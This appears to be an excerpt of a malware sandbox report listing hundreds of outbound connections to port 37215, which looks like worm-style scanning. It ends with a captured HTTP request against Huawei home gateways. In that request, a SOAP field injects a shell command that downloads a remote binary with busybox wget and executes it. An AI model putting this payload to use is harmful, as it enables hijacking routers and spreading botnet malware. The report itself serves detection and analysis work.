              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.12.119.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.87.21.50:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.118.234.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.87.207.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 147.216.236.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.133.130.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.49.20.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.240.193.227:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.0.162.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.208.3.145:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.24.196.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 80.179.209.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.202.55.143:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 112.37.219.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.66.224.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.171.99.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.22.246.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.95.1.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 114.165.11.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.241.243.108:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 106.229.50.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 166.154.145.4:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 205.99.215.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.52.184.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.67.140.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.94.56.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.230.111.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 163.87.41.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.60.164.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.24.91.178:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 150.166.229.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.10.191.162:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.145.27.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 198.138.109.214:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.29.194.189:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.190.111.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 43.35.16.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 147.142.37.113:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 62.88.199.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.149.142.4:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.76.123.184:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 175.124.23.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.158.162.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 176.205.156.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.211.104.249:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.127.34.63:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.226.49.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.16.206.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.31.113.8:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 160.248.249.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.108.48.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 8.147.103.116:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.78.7.70:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 212.29.15.168:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.213.164.188:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.186.63.173:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.212.134.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.85.177.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.67.182.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.14.86.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.243.227.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.91.156.26:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.72.54.51:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.228.40.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 164.117.238.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.132.1.247:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.41.86.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.76.71.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.213.235.60:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.44.87.220:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.139.205.0:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.231.32.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.70.208.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 74.52.98.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.165.38.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.143.115.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.47.42.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.42.22.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.216.61.169:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 145.65.19.153:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 48.199.20.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 18.179.149.216:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.23.197.89:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 141.68.202.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.203.80.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 93.10.60.137:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.216.157.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 120.184.207.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 43.61.37.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.194.28.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 147.93.245.50:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.141.130.24:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 51.183.69.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.66.112.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 102.75.136.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.173.62.161:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.61.4.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.139.123.176:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.164.32.64:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 9.215.128.222:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.199.14.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.139.129.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.93.106.80:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.79.4.219:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.212.29.107:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 151.157.130.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.146.191.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.126.246.157:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.125.69.17:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 36.144.199.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.8.177.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.139.79.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 178.141.42.90:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.175.142.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.57.172.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 60.142.29.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.137.3.81:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.184.171.120:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.113.109.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.44.195.231:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.79.117.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.108.32.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 42.167.77.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.102.94.195:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.189.150.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.107.57.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.68.66.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.66.221.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 36.30.181.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 98.223.103.48:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 150.79.217.192:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.214.123.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.2.0.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 126.31.219.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 87.216.72.151:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 223.68.156.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.150.69.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.181.39.40:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 90.96.183.93:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 170.41.187.237:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 177.138.206.94:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.180.246.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.120.244.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.75.238.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.60.247.211:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.24.89.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.169.167.144:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.104.135.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.239.80.113:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.237.199.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.32.254.126:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.156.53.254:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.92.244.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.202.185.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.165.191.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.158.140.57:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.255.209.135:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.239.78.62:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.127.47.252:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.110.112.255:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.111.165.219:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 133.243.102.56:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.96.6.152:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.193.28.103:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.123.177.45:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.21.101.181:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.215.130.71:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.212.75.1:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.99.112.245:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.6.135.37:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.129.24.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.128.86.83:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 154.130.125.16:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.90.157.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 39.168.123.68:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.248.31.241:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 153.129.89.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.214.41.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 198.174.47.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.36.216.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.40.71.235:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 176.98.142.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.126.167.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.3.155.238:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.94.236.228:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 4.136.57.230:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.19.44.150:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.138.77.208:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.49.54.172:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 90.187.190.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.246.144.6:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.127.249.104:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.166.118.133:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.200.103.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.140.21.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 168.97.114.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.74.65.131:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.103.122.74:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.165.70.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.135.152.246:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.138.18.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.108.248.89:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 130.56.207.174:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 8.157.249.207:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 143.207.209.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.61.129.204:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.101.158.67:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.137.115.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.6.153.101:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.129.12.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 213.199.108.76:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.243.63.133:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.35.166.173:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.132.223.177:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.118.193.109:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.253.117.118:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.216.235.244:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.175.147.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.46.212.99:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 2.37.1.53:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 24.103.168.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.205.59.126:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.24.151.13:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.236.64.54:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.233.68.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.95.214.214:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.246.88.239:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 105.101.7.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 74.64.143.194:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.100.245.210:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.154.219.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.33.17.110:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.99.129.61:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.186.80.151:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.83.57.111:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 205.52.233.153:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 120.83.16.229:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 182.129.109.98:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 48.136.163.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 68.75.192.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.135.101.151:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.239.82.15:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.32.176.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.12.144.240:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 223.46.107.42:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 170.183.123.36:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.18.195.205:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.142.134.5:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.19.68.87:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.92.95.132:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.219.155.65:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.42.5.164:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.49.234.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.204.15.133:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.82.131.93:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.245.191.88:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.5.75.236:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 90.64.226.123:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.209.95.186:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.137.45.234:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.69.234.108:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.196.107.96:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.74.238.28:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.7.123.73:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.167.95.138:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.107.242.233:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.197.241.29:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.16.182.79:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.85.199.86:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.48.175.116:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.129.174.72:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 104.59.252.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.103.236.242:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.31.193.171:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.34.34.148:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.113.186.12:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 131.1.124.206:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.198.179.2:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.247.175.84:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 107.199.148.78:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.200.6.159:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.162.75.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.188.174.69:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 121.14.34.243:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.144.91.100:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.94.233.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.232.125.225:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.106.204.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.77.215.193:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.71.155.224:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.175.158.108:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.179.37.21:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 178.8.219.3:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.107.192.187:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.173.201.209:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.94.14.180:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.237.173.113:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.70.214.41:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.22.77.191:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.1.136.140:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.34.244.170:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.248.51.250:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.197.18.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.88.77.124:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.73.169.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.67.35.218:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.60.90.98:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 121.120.67.117:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.166.70.190:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.13.197.184:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.109.165.102:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.214.162.179:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.147.53.226:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.241.206.77:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.177.145.183:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 41.112.78.136:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.225.220.58:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 197.226.140.142:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.106.156.217:37215
              Source: global trafficTCP traffic: 192.168.2.23:27912 -> 157.55.158.226:37215
              Source: unknownDNS traffic detected: query: BC@^]B replaycode: Name error (3)
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
